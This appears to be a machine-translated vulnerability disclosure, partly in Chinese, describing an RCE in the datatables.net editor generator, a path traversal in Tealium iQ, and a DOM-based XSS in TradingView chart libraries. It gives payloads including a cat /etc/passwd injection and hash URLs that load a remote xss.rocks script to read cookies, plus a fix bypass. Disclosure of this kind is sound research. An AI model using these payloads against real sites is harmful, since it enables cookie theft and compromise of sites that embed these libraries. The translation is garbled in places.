Copyright: Attribution, allow others to create paper-based, and must distribute paper (based on the original license agreement with the same license Creative Commons )
* This specification concerns related vulnerability has been fixed and submitted to vendors, technology research and discussion paper only, it is strictly prohibited for illegal purposes, or to bear all the consequences arising
Currently, many websites use third-party JavaScript libraries specific ways to enhance the functionality of the site display applications, under normal circumstances, this is embedded into the website of the library can be easily loaded directly from the third party service provider's domain, to achieve the current website optimization and functional enhancements. However, many sites that embed third-party libraries tend to be a deadly attack surface, it can lead to embed some potential sites more vulnerable to attack.
Disclosed herein are the current popular third-party JavaScript libraries in the three vulnerabilities, in view of the seriousness of these three vulnerabilities, might be embedded in thousands of organizations of these popular sites libraries affected.
Example 1: remote code execution vulnerability in datatables.net (RCE)
Datatables.net is dedicated to a HTML table displaying the free library site, its official website that as long as a memory embedded in your website in cdn.datatables.net the .js or .css file, will be able to achieve the display of HTML tables.
In other words, if a large number of Internet sites embedded in the memory of cdn.datatables.net .js or .css file as a repository site, then there are loopholes as long as both the repository file, then the corresponding references embedded website it may be adversely affected.
The Australian government websites in the following example, in which it is embedded references to .js library files are stored in the cdn.datatables.net - jquery.dataTables.min.js:
When browsing datatables.net official website service can be seen, which js https://editor.datatables.net/generator/ library file application initiates a request to the remote, the remote applications will generate and test some need to display HTML table in the background. After generating a new form for each request, and accordingly will be generated and returned to the target site a php file. We use this .datatables.net generated php file filtering vulnerabilities, which can be written in certain parameters, to achieve a certain degree of RCE attacks, for example, we can write RCE Payload in the red box below php create mechanisms:
in $ _GET (1), the change to the 1 cat / etc / passwd, and see what happens:
in this way, the password file datatables.net in the / etc / passwd will be read out directly, the other, proven, It can be read using the vulnerability cdn.datatables.net other sensitive documents. RCE add this third party library file provider reads the loopholes appeals to the imagination, of course, embedded in a large number of websites these library files, which affected the degree think are scared.
Vulnerability Example 2: The path traversal vulnerability Tealium iQ (Path Traversal)
Smart Label Management Solutions Tealium iQ company provides specialized data tag for effective management, as long as a Tealitma IQ label, the label can replace all businesses on the site, to achieve control of the online marketing solutions. As quoted on the website Uber embedded Tealium iQ tag Service:
The service request will go to the library Tealium iQ .js file named tags.tiqcdn.com of:
https://tags.tiqcdn.com/utag///prod/utag.js
这里存在的漏洞是,Tealium iQ标签服务对网站输入的配置文件名(Profile Name)数据处理不当,问题在于,Tealium iQ远端服务允许 / 和 . 两种特殊字符在Profile Name中存在。
可以利用这两种字符来操控那些加载配置文件的目录,例如,如果配置文件名称中有…/…/utag/uber/main,那么,其相应的js代码就会向上传到tags.tiqcdn.com中形成https://tags.tiqcdn.com/utag/uber/main/prod/utag.js这样,它将被嵌入到任何利用Tealium iQ的Uber网站页面中。
该漏洞已在Uber漏洞众测项目和其它Bug赏金平台提交上报过,在此,我编写了以下简单的代码,通过它可以更改任意tags.tiqcdn.com上的js文件,实现对tags.tiqcdn.com的目录遍历。
该漏洞可能会对Uber、Microsoft、Cisco和Inte的大多数网站造成影响。
漏洞示例3:TradingView图表库中的DOM Based XSS漏洞
TradingView提供专门的流行图表绘制显示服务,在金融和加密货币交易平台应用相较广泛,可以说,大多的加密货币交易平台都使用了它提供的图表服务库显示了在线交易信息。然而,2018年9月24日,名为Victor Zhu的安全研究人员发现了TradingView的一个高危DOM Based XSS漏洞,所有引用嵌入其库文件的加密货币网站都受到影响。
任何引用嵌入TradingView库文件的网站中都会存在一个可被公开访问的,样式为tv-chart.html的文件,这个html文件通过location.hash参数来初始化交易图表,图表初始化完成之后,指向以下类型页面的iframe链接将被加载到网站页面上:
https://example.com/tradingview/en-tv-chart.x.html#symbol=BTC_ETH&interval=180&widgetbar=%7B%22details%22%3Afalse%2C%22watchlist%22%3Afalse%2C%22watchlist_settings%22%3A%7B%22default_symbols%22%3A%5B%5D%7D%7D&drawingsAccess=%7B%22type%22%3A%22black%22%7D&locale=en&uid=tradingview_36472&clientId=tradingview.com&userId=public_user&chartsStorageVer=1.0&debug=false&timezone=Asia%2FTaipei&theme=Dark
Vulnerability is that a third-party library files to load chart TradingView function, indicatorsFileparameter the function of the input from the target site get a link, and transmitted to the $ .getScript () in:
D ? $.getScript(urlParams.indicatorsFile).done(function() {…})
So, you can get a link on the issue, which is injected in a remote js file, to achieve malicious purposes, such as:
https://example.com/tradingview/en-tv-chart.x.html#disabledFeatures=[]&enabledFeatures=[]&indicatorsFile=//xss.rocks/xss.js
When the user accesses this link, it will load and run the remote xss.rocks/xss.js read user Cookie:
When the vulnerability was disclosed, TradingView released a new version of the library file replaces the hotfix, which is responsible before function loads the third-party chart was made to replace modified, modified function as follows:
However, this fix vulnerabilities still exist, when you add uid = urlParams parameter can be used to reproduce the vulnerability thecustomIndicatorsUrl parameter appears before the final structure Payload as follows:
https://example.com/tradingview/en-tv-chart.x.html#disabledFeatures=[]&enabledFeatures=[]&customIndicatorsUrl=//xss.rocks/xss.js&uid=urlParams
After, TradingView again libraries were repaired and finally completely stopped the leak. However, after a number of encryption currency trading platform is still in a vulnerable file in the repository, by all current encryption currency trading platform has been tested discovery, including CoinMarketCap and some of the larger volume of more than 90 platform still exists TradingView library the Dom Based XSS vulnerabilities, TradingView of these platforms were promptly inform, but:
46家交易平台选择忽视该漏洞通报;
44家交易平台进行了回复并询问了详细技术细节;
19家交易平台最终修复了该漏洞;
7家交易平台建议对该漏洞给予奖励。
to sum up
As security personnel, when testing Web application security, which should be used, including third-party products or programs considered, they are also vital; as website operators who will have to be careful to use third-party libraries embedded quotations file.